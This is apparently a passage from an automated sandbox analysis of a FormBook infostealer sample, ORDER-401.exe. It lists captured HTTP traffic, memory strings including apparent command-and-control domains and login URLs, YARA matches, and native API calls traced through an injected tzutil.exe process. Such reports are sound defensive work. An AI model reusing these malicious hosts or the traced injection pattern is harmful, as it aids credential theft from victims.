09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:39:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:39:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:39:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:39:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ORDER-401.exeString found in binary or memory: http://www.elderscrolls.com/skyrim/characterK
                Source: ORDER-401.exeString found in binary or memory: http://www.elderscrolls.com/skyrim/characterT
                Source: ORDER-401.exeString found in binary or memory: http://www.elderscrolls.com/skyrim/player
                Source: PcwrDoOfOMD.exe, 00000009.00000002.3260626041.0000000004E8B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.likesharecomment.net
                Source: PcwrDoOfOMD.exe, 00000009.00000002.3260626041.0000000004E8B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.likesharecomment.net/nqht/
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                Source: PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 00000008.00000003.2286137861.0000000007BF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033O
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s.yimg.com/wi/ytc.js
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003E98000.00000004.10000000.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000003108000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.ORDER-401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.ORDER-401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: ORDER-401.exe
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0042C953 NtClose,4_2_0042C953
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582B60 NtClose,LdrInitializeThunk,4_2_01582B60
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01582DF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01582C70
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015835C0 NtCreateMutant,LdrInitializeThunk,4_2_015835C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01584340 NtSetContextThread,4_2_01584340
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01584650 NtSuspendThread,4_2_01584650
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582BF0 NtAllocateVirtualMemory,4_2_01582BF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582BE0 NtQueryValueKey,4_2_01582BE0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582B80 NtQueryInformationFile,4_2_01582B80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582BA0 NtEnumerateValueKey,4_2_01582BA0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582AD0 NtReadFile,4_2_01582AD0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582AF0 NtWriteFile,4_2_01582AF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582AB0 NtWaitForSingleObject,4_2_01582AB0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582D10 NtMapViewOfSection,4_2_01582D10
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582D00 NtSetInformationFile,4_2_01582D00
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582D30 NtUnmapViewOfSection,4_2_01582D30
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582DD0 NtDelayExecution,4_2_01582DD0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582DB0 NtEnumerateKey,4_2_01582DB0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582C60 NtCreateKey,4_2_01582C60
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582C00 NtQueryInformationProcess,4_2_01582C00
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582CC0 NtQueryVirtualMemory,4_2_01582CC0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582CF0 NtOpenProcess,4_2_01582CF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582CA0 NtQueryInformationToken,4_2_01582CA0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582F60 NtCreateProcessEx,4_2_01582F60
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582F30 NtCreateSection,4_2_01582F30
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582FE0 NtCreateFile,4_2_01582FE0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582F90 NtProtectVirtualMemory,4_2_01582F90
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582FB0 NtResumeThread,4_2_01582FB0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582FA0 NtQuerySection,4_2_01582FA0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582E30 NtWriteVirtualMemory,4_2_01582E30
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582EE0 NtQueueApcThread,4_2_01582EE0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582E80 NtReadVirtualMemory,4_2_01582E80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01582EA0 NtAdjustPrivilegesToken,4_2_01582EA0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01583010 NtOpenDirectoryObject,4_2_01583010
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01583090 NtSetValueKey,4_2_01583090
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015839B0 NtGetContextThread,4_2_015839B0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01583D70 NtOpenThread,4_2_01583D70
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01583D10 NtOpenProcessToken,4_2_01583D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D4340 NtSetContextThread,LdrInitializeThunk,8_2_031D4340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D4650 NtSuspendThread,LdrInitializeThunk,8_2_031D4650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2B60 NtClose,LdrInitializeThunk,8_2_031D2B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_031D2BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_031D2BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_031D2BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2AD0 NtReadFile,LdrInitializeThunk,8_2_031D2AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2AF0 NtWriteFile,LdrInitializeThunk,8_2_031D2AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2F30 NtCreateSection,LdrInitializeThunk,8_2_031D2F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2FB0 NtResumeThread,LdrInitializeThunk,8_2_031D2FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2FE0 NtCreateFile,LdrInitializeThunk,8_2_031D2FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_031D2E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_031D2EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_031D2D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_031D2D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2DD0 NtDelayExecution,LdrInitializeThunk,8_2_031D2DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_031D2DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_031D2C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2C60 NtCreateKey,LdrInitializeThunk,8_2_031D2C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_031D2CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D35C0 NtCreateMutant,LdrInitializeThunk,8_2_031D35C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D39B0 NtGetContextThread,LdrInitializeThunk,8_2_031D39B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2B80 NtQueryInformationFile,8_2_031D2B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2AB0 NtWaitForSingleObject,8_2_031D2AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2F60 NtCreateProcessEx,8_2_031D2F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2F90 NtProtectVirtualMemory,8_2_031D2F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2FA0 NtQuerySection,8_2_031D2FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2E30 NtWriteVirtualMemory,8_2_031D2E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2EA0 NtAdjustPrivilegesToken,8_2_031D2EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2D00 NtSetInformationFile,8_2_031D2D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2DB0 NtEnumerateKey,8_2_031D2DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2C00 NtQueryInformationProcess,8_2_031D2C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2CC0 NtQueryVirtualMemory,8_2_031D2CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D2CF0 NtOpenProcess,8_2_031D2CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D3010 NtOpenDirectoryObject,8_2_031D3010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D3090 NtSetValueKey,8_2_031D3090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D3D10 NtOpenProcessToken,8_2_031D3D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D3D70 NtOpenThread,8_2_031D3D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028D96E0 NtDeleteFile,8_2_028D96E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028D9780 NtClose,8_2_028D9780
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028D9480 NtCreateFile,8_2_028D9480
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028D95F0 NtReadFile,8_2_028D95F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028D98E0 NtAllocateVirtualMemory,8_2_028D98E0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 0_2_02A7CD240_2_02A7CD24
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 0_2_07CB92980_2_07CB9298
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004189C34_2_004189C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0041021B4_2_0041021B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004012204_2_00401220
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004102234_2_00410223
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004022DE4_2_004022DE
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004022E04_2_004022E0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00416BCE4_2_00416BCE
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00416BD34_2_00416BD3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004104434_2_00410443
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0040E4634_2_0040E463
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0040E5B34_2_0040E5B3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0040262C4_2_0040262C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004026304_2_00402630
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00402F504_2_00402F50
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0042EF234_2_0042EF23
